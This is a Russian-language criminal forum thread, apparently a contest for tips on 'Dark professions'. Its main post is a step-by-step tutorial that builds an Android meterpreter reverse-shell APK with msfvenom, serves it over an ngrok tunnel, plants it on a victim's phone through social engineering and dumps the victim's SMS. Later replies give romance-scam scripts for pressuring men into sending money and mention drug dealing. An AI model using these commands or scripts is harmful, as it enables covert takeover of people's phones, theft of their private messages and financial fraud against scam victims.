Deanon Club | Мир знаний

Я читаю крайние посты до середины и понимаю что ребята не поняли задания от TC ну это же пишут не о себе и не фишку из личного опыта и даже не интересный факт просто текст с другова форму или какой новостной ленты... Ни какова негатива камон ребята соберитесь..
 

Удаленный доступ в этичном взломе​

Удаленный доступ - это уязвимость, с помощью которой злоумышленники могут управлять любым устройством. Чаще всего полезные нагрузки используются для удаленного управления. Полезные данные отправляются с помощью социальной инженерии или фишинговых атак. Как только вводится полезная нагрузка, начинается настоящая атака. Полезная нагрузка обеспечит обратное соединение. Чаще всего для создания полезных нагрузок используется платформа Metasploit. В платформе Metasploit существует три разных типа модулей полезной нагрузки:

  • Синглы
  • Этапы
  • Этапы.
drawremotegeekstogeek.png

Давайте посмотрим, как мы можем использовать и получать удаленный доступ к устройству Android с помощью Metasploit. В Android нам нужен termux для запуска Metasploit. После установки termux нам необходимо установить фреймворк Metasploit.
geekstermux1.png

После установки платформы Metasploit просто запустите pkg update && pkg upgrade, чтобы обновить свой компьютер. Затем введите termux-setup-storage, чтобы избежать проблем, связанных с разрешениями. termux-setup-storage - это команда, используемая в termux для предоставления разрешения на хранение. Это делается для того, чтобы сохранить полезную нагрузку внутри устройства или скопировать полезную нагрузку из termux на мобильный. теперь, если вы введете команду ls, вы увидите каталог с именем storage . ls означает перечислить текущий каталог и является командой, используемой в Linux для перечисления файлов внутри текущего каталога.

Основные команды:​

  • $ pkg update && pkg upgrade
  • $ termux-setup-storage
Мы можем генерировать различные типы полезных нагрузок на основе требований. Давайте сначала сгенерируем полезную нагрузку, чтобы получить доступ к устройству, подключенному к той же сети. одна и та же сеть относится к устройствам, подключенным друг к другу либо напрямую, либо через мобильную точку доступа (беспроводную сеть). давайте создадим полезную нагрузку с именем Geeks.apk.

Создание полезной нагрузки с помощью следующей команды msfvenom содержит стандартные параметры командной строки, используемые для создания полезной нагрузки. lhost означает ваш IP-адрес. просто введите ifconfig, чтобы узнать свой IP-адрес. lport будет номером порта, который вы можете ввести свой собственный номер порта.
termuxifcon1.png

  • msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.60.255 lport= 5321 R> Geeks.apk
После генерации полезной нагрузки скопируйте полезную нагрузку в свое хранилище, используя команду cp Geeks.хранилище apk. Теперь можно увидеть полезную нагрузку внутри хранилища, просто набрав cd storage и ls.
termuxpaycom1.png

Теперь просто зайдите в хранилище, загрузите Geeks.apk и разрешите все разрешения. Это обеспечит обратное подключение к хост-машине.

давайте посмотрим, как мы можем использовать это. Просто введите команду msfconsole. Это откроет новый интерфейс. затем введите следующие команды.

Теперь просто зайдите в хранилище, загрузите Geeks.apk и разрешите все разрешения. Это обеспечит обратное подключение к хост-машине.

давайте посмотрим, как мы можем использовать это. Просто введите команду msfconsole. Это откроет новый интерфейс. затем введите следующие команды.

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) >
set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) >
set LHOST your_ip
msf6 exploit(multi/handler) >
set PAYLOAD your_port
msf6 exploit(multi/handler) >
exploit

Примечание: Введите lhost и lport то, что вы ввели при создании полезной нагрузки.

atermuxpay.jpeg

Теперь у нас сессия meterpreter. сеанс meterpreter - это не что иное, как обратное соединение. вы можете ввести справку, если хотите знать, что мы можем сделать с этим сеансом.

ahelp1.png

вы можете сделать много вещей, используя эту полезную нагрузку. давайте попробуем получать сообщения с устройства жертвы, для этого вам следует ввести dump_sms $HOME. dump_sms относится к команде для отправки всех SMS с устройства жертвы на наше устройство, а $HOME относится к месту хранения SMS. Мы можем переместить этот файл SMS из домашнего каталога в наше хранилище, используя команду:

$ mv sms_file_name storage
$ cd storage
$ mv sms_file-name downlods

Теперь можно легко читать все сообщения из загрузок:

aexploit1.png

Удаленный доступ приведет к потере конфиденциальности. Злоумышленник может делать все, что захочет. Но это на локальном хостинге.

Теперь давайте посмотрим, как можно использовать устройство где-нибудь по всему миру. Для этого, беспроводного, мы должны загрузить ngrok. Поскольку мы используем WAN (беспроводную сеть). загрузите ngrok для Linux с веб-сайта ngrok. В termux введите следующую команду:

$ cd storage
//refers to change directory from home to storage.
$ cd downloads
//refers to changing the directory from storage to downloads.
$ mv ngrok $HOME
//move ngrok from downloads to the home directory.
$ chmod +x ngrok
//providing permission

В большинстве случаев ngrok не запускается в обычной среде. поэтому необходимо загрузить ubuntu или любую внешнюю ОС. Вы можете легко загрузить ubuntu через приложение Linux.

После успешной установки ngrok зарегистрируйтесь в ngrok и подтвердите свой токен авторизации, выполнив команду. вы можете найти свой токен авторизации, как только войдете в ngrok.

$ ./ngrok config add-authtoken <token>

Теперь мы должны запустить TCP-сервер для переадресации портов. Для запуска TCP-сервера используйте следующую команду.

$ ./ngrok tcp 5431

angrok1.png

Создание полезной нагрузки аналогично предыдущему, но lhost и lport должны быть изменены в соответствии с ngrok. В приведенном выше случае LHOST будет 6.tcp.ngrok.ввод-вывод и LPORT будут равны 16960. Это будет отличаться каждый раз, когда мы запускаем TCP-сервер с использованием ngrok. ngrok должен активировать другой сеанс, чтобы установить соединение.

$ msfvenom -p android/meterpreter/
reverse_tcp lhost=6.tcp.ngrok.io
lport=16960 R> Geeks.apk

apayload1.png

Как и в предыдущем, переместите полезную нагрузку из домашнего каталога в загрузочный. Теперь полезная нагрузка должна быть отправлена на устройство жертвы, и это зависит от ваших навыков социальной инженерии. После успешной установки полезной нагрузки на устройство жертвы запустите msfconsle, чтобы получить сеанс интерпретатора. для этого используйте следующие команды.
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler)
> set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler)
> set LHOST 0.0.0.0
msf6 exploit(multi/handler)
> set PAYLOAD your_port (in my case it is 5544)
msf6 exploit(multi/handler)
> exploit

apayexploit1.png

Теперь, используя это, мы получаем доступ к устройству жертвы. Мы можем многое сделать без ведома жертв’ вот как работает удаленный доступ. Существует множество способов, с помощью которых мы можем получить доступ к удаленному устройству. Обычно бэкдоры создаются для того, чтобы оставаться внутри устройств жертв. полезная нагрузка - это тип бэкдора, через который мы использовали целевое устройство.

draw2.png
 
Я читаю крайние посты до середины и понимаю что ребята не поняли задания от TC ну это же пишут не о себе и не фишку из личного опыта и даже не интересный факт просто текст с другова форму или какой новостной ленты... Ни какова негатива камон ребята соберитесь..
Да тут с середины началось новорег статья новорег статья и все от 1 Даши идет xD я уж с психу написал чтобы я делал чтоб победить в конкурсе этим способом))
 
Да тут с середины началось новорег статья новорег статья и все от 1 Даши идет xD я уж с психу написал чтобы я делал чтоб победить в конкурсе этим способом))
Конечно. Никто не хочет палиться что статьи ворует ))
 
Конечно. Никто не хочет палиться что статьи ворует ))
За то у меня сразу понятно что писал по накуру по фану xD Даже не редактировал шрифты не менял так закинул текстовой бомбой, был бы я по моложе я бы составил манул, а щас даже задумываюсь стоит ли составлять уж больно мооральная сторона вопроса беспокоит) Ну хотяб я бабулек не разводил ,,Ало это сбербанк,, xD
 
За то у меня сразу понятно что писал по накуру по фану xD Даже не редактировал шрифты не менял так закинул текстовой бомбой, был бы я по моложе я бы составил манул, а щас даже задумываюсь стоит ли составлять уж больно мооральная сторона вопроса беспокоит) Ну хотяб я бабулек не разводил ,,Ало это сбербанк,, xD
У меня было во сновном: ,,Привет только что пришла из туристического агенства и не много расстроенна, дальше писал то что когда я считала сумму я думала что уложусь Виза(Консульский сбор)+билет, а там еще нужно бронировать атель или получать офицальное приглашение в страну от тебя(это слишком долго), а отель слишком дорого... бла бла бла ,, и тут мужчина либо начинает сливаться и его нужно тянуть либо у него играет его мужское я и остается только подвести под перевод денег
 
У меня было во сновном: ,,Привет только что пришла из туристического агенства и не много расстроенна, дальше писал то что когда я считала сумму я думала что уложусь Виза(Консульский сбор)+билет, а там еще нужно бронировать атель или получать офицальное приглашение в страну от тебя(это слишком долго), а отель слишком дорого... бла бла бла ,, и тут мужчина либо начинает сливаться и его нужно тянуть либо у него играет его мужское я и остается только подвести под перевод денег
Если начинает сливаться надо его мягко поставить перед фактом, типо хорошо я поговорю с работадателем о переносе отпуска, потом с следуйщем сообщении пишешь что поговорила с ним в бухгалтерии организации сказали что уже документы подписаны и мой отпуск утвержден и типо я так растроенна бла бла бла если не желает проявить мужское я то нужно тогда спрашивать мягко и на прямую типо может быть ты сможешь чем нибудь помочь, если хочет сам купить билеты то аргементируй что так тебе визу не дадут во время прохождения собеседования в посольстве они далжны быть куплены тобой+ так же атель должен быть оплачен тобой и забронирован на твое имя.
 
Если начинает сливаться надо его мягко поставить перед фактом, типо хорошо я поговорю с работадателем о переносе отпуска, потом с следуйщем сообщении пишешь что поговорила с ним в бухгалтерии организации сказали что уже документы подписаны и мой отпуск утвержден и типо я так растроенна бла бла бла если не желает проявить мужское я то нужно тогда спрашивать мягко и на прямую типо может быть ты сможешь чем нибудь помочь, если хочет сам купить билеты то аргементируй что так тебе визу не дадут во время прохождения собеседования в посольстве они далжны быть куплены тобой+ так же атель должен быть оплачен тобой и забронирован на твое имя.
И надо разбавлять все это жалость словами о любви и о том что капец полный пример: ,,Я думала что мы этот отпуск проведем вместе с тобой мой дорогой ***. Я мечтала как буду будить тебя по утрам готовить тебе вкусную Русскую еду. Как будем проводить время с тобой только ты и я. Как будем гулять ночью и смотреть на звезды, но все мои планы идут под нож,, Все зависит от ваших мозгов и Романтики например в скелете общения у меня были заготовки типо еда которую приготовила и другие все мелочи вовремя общения до закидона за поезду должны понемногу откладываться у Мамонта в подкорке мозга. Так же нужно правильно формулировать предложения для переводчика и проверять переводом обратно на русский язык.
 
Привет всем!

В недавнем времени я зашёл в роли СМИ на данный проект, но также, многие могут знать меня и за его пределами. Моя цель - развитие по большей мере hacking сфер, а потому и конкурс это не обойдёт стороной

Условие (любое из 3 - на выбор):

- Написать один интересный факт, про любую из Dark профессий
- Написать полезную информацию (фишку из личного опыта), для любой из Dark профессий
- Написать про подводные камни, любой из Dark профессий

Приз:
Всего будет 3 победителя! Каждый получит курс (мануал) по пентесту и активному боковому перемещение, по корпоративной сети - ценой 100 000$. А также, бесплатную консультацию по кибербезопасности - и настройку системы с нуля, под любые задачи + 10.000 рублей.

Итоги по конкурсу будут в 22.00 - 24.00, 19.05.2023

Мой канал - https://t.me/+6tLXOKJV9z9mMzdi
Ну что ждём результатов
 
Основным методом «вычисления» личности пользователя в Сети является определение
его IP-адреса, который позволяет вычислить географическое расположение человека и
даже узнать точно, кто это такой. Этим способом активно пользуются как
правоохранительные органы через СОРМ (обязательная к установке по требованию
ФСБ система технических средств для обеспечения функций оперативно-розыскных
мероприятий, которая по закону о связи есть у любого телеком-оператора,
работающего на территории России),так и другие заинтересованные стороны через
аналогичные поисково-аналитические системы сбора информации. На вычисление
пользователя по IP может уйти совсем немного времени. Конкретный адрес находится в
пуле выданных определенному оператору адресов, и правоохранительным органам
достаточно сделать соответствующий запрос на раскрытие персональных данных
абонента связи. Если IP динамически назначаемый, потребуется чуть больше времени.
В этом случае провайдер раскроет подсеть, включающую определенный ограниченный
список адресов, перебор которых позволит с нескольких попыток вычислить
необходимого человека.
Понять, где он находится, еще проще: все IP связаны с MAC-адресами оборудования,
на котором работает пользователь, — ноутбуков, компьютеров, планшетов и
смартфонов. Те, в свою очередь, получают доступ в Сеть от телеком-оборудования,
которое установлено в конкретном месте на карте (распределительные
маршрутизаторы, вышки базовых станций, Wi-Fi-роутеры и т. д.). Именно поэтому сбор
IP-адресов без ведома пользователей не раз приводил к громким скандалам, связанным
с приватностью. Так, экипажи картографов Google умудрялись захватывать данные
домашних беспроводных сетей и создавали таким образом интерактивную карту
местонахождения пользователей, а компания Apple следила за владельцами iOS-
устройств, собирая геолокационные сведения даже при отключенном GPS по базовым
станциям операторов связи. Сейчас же информация о действиях в Сети активно
собирается правообладателями, которые отслеживают загрузку и обмен
медиаконтентом в Интернете, правоохранительными органами и многими
рекламномаркетинговыми службами, которые составляют на интернет-пользователей
«досье», чтобы потом навязчиво предлагать им товары и услуги.
Помимо IP-адреса в идентификации личности помогают и cookies — служебные файлы,
в которых хранится информация о сеансах работы пользователя с веб-ресурсом (ОС,
браузер, разрешение экрана, региональные настройки, часовой пояс и т. д.), а также
логины и пароли, которые тоже могут вывести на след человека. Многие веб-сайты
ставят в систему специальные следящие cookies, которые мониторят активность
посетителей не только на этом ресурсе, но и на других. Не последнюю роль играют и
социальные сети, накапливающие растущий с каждым мгновением массив информации
о почти каждом человеке, который когда-либо был в них зарегистирован. Если вы не
выходите из своего аккаунта в соцсети, когда работаете в Интернете, то велик шанс,
что в сервисе остается история просмотра сайтов, а если вы еще и активно «лайкаете»
материалы на разных онлайн-ресурсах, то эти данные сохраняются в социальных сетях
даже после удаления анкеты (если вы, конечно,вообще сможете ее удалить).
 
Привет всем!

В недавнем времени я зашёл в роли СМИ на данный проект, но также, многие могут знать меня и за его пределами. Моя цель - развитие по большей мере hacking сфер, а потому и конкурс это не обойдёт стороной

Условие (любое из 3 - на выбор):

- Написать один интересный факт, про любую из Dark профессий
- Написать полезную информацию (фишку из личного опыта), для любой из Dark профессий
- Написать про подводные камни, любой из Dark профессий

Приз:
Всего будет 3 победителя! Каждый получит курс (мануал) по пентесту и активному боковому перемещение, по корпоративной сети - ценой 100 000$. А также, бесплатную консультацию по кибербезопасности - и настройку системы с нуля, под любые задачи + 10.000 рублей.

Итоги по конкурсу будут в 22.00 - 24.00, 19.05.2023

Мой канал - https://t.me/+6tLXOKJV9z9mMzdi
Еще один действенный метод обеспечения приватности в Сети — применение средств
анонимизации и работа с интернет-сервисами через прокси-серверы. Это требует
определенной настройки компьютера и чаще всего приводит к замедлению скорости обмена данными, отключает определенные функции (например, не будут работать
Flash-анимация и ActiveX-содержимое) и ограничивает активность пользователя (в
браузере нельзя будет открывать файлы для просмотра и загружать их через
встроенный менеджер закачек) из-за необходимости соблюдения приватности. Кроме
того, вполне вероятно, что работа под прокси будет недолгой: адреса этих серверов
активно блокируются для предотвращения массовых рассылок спама, DDoS-атак,
несанкционированных проникновений и т. д.
«Анонимизироваться» можно и путем подмены IP-адреса — такие программы были
особо популярны несколько лет назад, однако сейчас они менее востребованы по
перечисленным выше причинам. В своем описании их создатели заявляют о «скрытии
IP» — под этим понимается смена и переадресация на один из списков прокси, который
менее «засвечен» в Глобальной сети, чем все остальные. Более надежный способ —
использование специальных клиентов, предлагающих организовать распределенный
P2P-обмен трафиком, в котором не будет возможности «найти концы». Такие решения
сегодня более актуальны, поскольку в них используется не некий список серверов, а
другие IP-адреса конкретных пользователей Интернета, которые, естественно, очень
быстро сменяют друг друга, передавая разбитую на фрагменты информацию. Обвинить
их всех в нелегальной деятельности будет крайне затруднительно (но возможно,
поскольку прецеденты вычисления пользователей BitTorrent, задействующих
анонимайзеры, имели место). К таким программам относятся Tor, I2P и JAP.
Существуют способы перехвата и анализа трафика в публичных сетях. Зная, с какими
адресами в Интернете вы устанавливаете соединение, можно как минимум узнать ваши
предпочтения и поведение. Лучшее средство от «подглядывания» за вашим трафиком
— Tor, децентрализованная сеть прокси-серверов. В составе программы есть
анонимайзер TCP/IP-трафика и прокси-фильтр содержимого веб-страниц, который
дополнительно обеспечивает анонимность. Весь трафик шифруется, и его невозможно
перехватить на стороне провайдера, поскольку маршруты пересылки пакетов делятся
на цепочки переходов между узлами сети, которые постоянно изменяются (каждые
десять минут). В настоящее время Tor функционирует за счет порядка 2500
распределенных серверовнодов, к которым производится попеременное
«многослойное» подключение с шифрованием. По умолчанию каждый пакет данных
внутри сети проходит через три территориально удаленных нода, выбираемых
случайным образом, будучи зашифрован тремя ключами безопасности. На каждом ноде
соответствующая защита снимается для того, чтобы программа знала, в каком
направлении далее отправляется фрагмент данных — это похоже на то, как чистят
луковицу или капусту.
 
Еще один действенный метод обеспечения приватности в Сети — применение средств
анонимизации и работа с интернет-сервисами через прокси-серверы. Это требует
определенной настройки компьютера и чаще всего приводит к замедлению скорости обмена данными, отключает определенные функции (например, не будут работать
Flash-анимация и ActiveX-содержимое) и ограничивает активность пользователя (в
браузере нельзя будет открывать файлы для просмотра и загружать их через
встроенный менеджер закачек) из-за необходимости соблюдения приватности. Кроме
того, вполне вероятно, что работа под прокси будет недолгой: адреса этих серверов
активно блокируются для предотвращения массовых рассылок спама, DDoS-атак,
несанкционированных проникновений и т. д.
«Анонимизироваться» можно и путем подмены IP-адреса — такие программы были
особо популярны несколько лет назад, однако сейчас они менее востребованы по
перечисленным выше причинам. В своем описании их создатели заявляют о «скрытии
IP» — под этим понимается смена и переадресация на один из списков прокси, который
менее «засвечен» в Глобальной сети, чем все остальные. Более надежный способ —
использование специальных клиентов, предлагающих организовать распределенный
P2P-обмен трафиком, в котором не будет возможности «найти концы». Такие решения
сегодня более актуальны, поскольку в них используется не некий список серверов, а
другие IP-адреса конкретных пользователей Интернета, которые, естественно, очень
быстро сменяют друг друга, передавая разбитую на фрагменты информацию. Обвинить
их всех в нелегальной деятельности будет крайне затруднительно (но возможно,
поскольку прецеденты вычисления пользователей BitTorrent, задействующих
анонимайзеры, имели место). К таким программам относятся Tor, I2P и JAP.
Существуют способы перехвата и анализа трафика в публичных сетях. Зная, с какими
адресами в Интернете вы устанавливаете соединение, можно как минимум узнать ваши
предпочтения и поведение. Лучшее средство от «подглядывания» за вашим трафиком
— Tor, децентрализованная сеть прокси-серверов. В составе программы есть
анонимайзер TCP/IP-трафика и прокси-фильтр содержимого веб-страниц, который
дополнительно обеспечивает анонимность. Весь трафик шифруется, и его невозможно
перехватить на стороне провайдера, поскольку маршруты пересылки пакетов делятся
на цепочки переходов между узлами сети, которые постоянно изменяются (каждые
десять минут). В настоящее время Tor функционирует за счет порядка 2500
распределенных серверовнодов, к которым производится попеременное
«многослойное» подключение с шифрованием. По умолчанию каждый пакет данных
внутри сети проходит через три территориально удаленных нода, выбираемых
случайным образом, будучи зашифрован тремя ключами безопасности. На каждом ноде
соответствующая защита снимается для того, чтобы программа знала, в каком
направлении далее отправляется фрагмент данных — это похоже на то, как чистят
луковицу или капусту.
Ты тут немного не прав, СОРМ новых версии вобще всесь твой трафик зашифрованый или нет сохраняет за тобой, если на тебя вышли в реале то все привет пиши пропало потому что каждое твое подключение будет записано, не знаю подробностей, но закомый фбс говорил если на тебя поставили уже сорм то как шифруй как не шифруй одной цепочки куда даных, ушли что к тебе и откуда пришло будет достаточно чтоб дешифральщик в твоей попе и твое чуство самосохранения даст все что нужно органам правопорядка))
 
Последнее редактирование:
Ждем результаты конкурса) Если чесн не читал высеры новорегов так как эта инфа копипаст только прочитал про СОРМ уже ржать захотел)
 
Если что так же по нова крипт и прочую фигню шифрования, все зависит от вашей силы воли и болевого порога. Обычные читатели покупают тут не больше десятка грамм, не будет ни кто заморачиваться для вас так же и кладмены которых палят на закупках паков и раходников, а потом орут шоп красный меня спалили, ау Китайский али и другие конторы давно под прицелом правоохранителей как и поставщики прекурсоров. Поймают для отчетности парочку а пару десятков кг дадут сбыть так ак это их хлеб и такая же палочная система...
 
На каждого ушлого найдется еще более ушлый) Давно бы все прикрыли, но в РФ рука руку моет в итоге все в помоях....
 
1 Победитель - @BurberryBricks
2 Победитель - @LixojValera
3 Победитель - @Temp-Clock

Извините за задержку! Долго решали, кому же отдать приз. Победители - напишите мне в личные сообщения на форуме!
Всем спасибо 👾
 
Я хоть и не участник конкурса, но следил за процессом. Неужели на втором месте разместился персонаж, который просто скопипастил статью с Дзена? В этом и заключается конкурс: скопировать и вставить?

upd: да и статья от Temp-Clock - банальная писанина от AI. Все вводные слова и конструкции идентичны с теми, что выдает chatGPT. круто выбирали))))
 
1 Победитель - @BurberryBricks
2 Победитель - @LixojValera
3 Победитель - @Temp-Clock

Извините за задержку! Долго решали, кому же отдать приз. Победители - напишите мне в личные сообщения на форуме!
Всем спасибо 👾
Да не решали кому отдать приз тебе просто пох на конкурс стало. Признай активности почти нет, ты ожидал большего от этого розыгрыша и калаба в итоге остался в минусах, у тя в фулдилке созвона больше актива чем тут, половина спизжено и только единицы писали от руки и свои матерьял, а в итоге 2 место ху**сос конр ц конр в. Чесно пох на конкурс так как участвовал тупо ради халявных 10к которых не жалко будет на гарик потратить, ну чтож буду курить шишки, а ху**сос на котр ц контр в чтоб у тя ненаходы по кд были и модераторы отшивали.
 
Я хоть и не участник конкурса, но следил за процессом. Неужели на втором месте разместился персонаж, который просто скопипастил статью с Дзена? В этом и заключается конкурс: скопировать и вставить?

upd: да и статья от Temp-Clock - банальная писанина от AI. Все вводные слова и конструкции идентичны с теми, что выдает chatGPT. круто выбирали))))
Ну Temp-Clock хотяб задавал водные в аи работал ручками правильно формулировал запросы в него это тоже труд чем просто спиздить матерьял и выйграть.
 
Верх Низ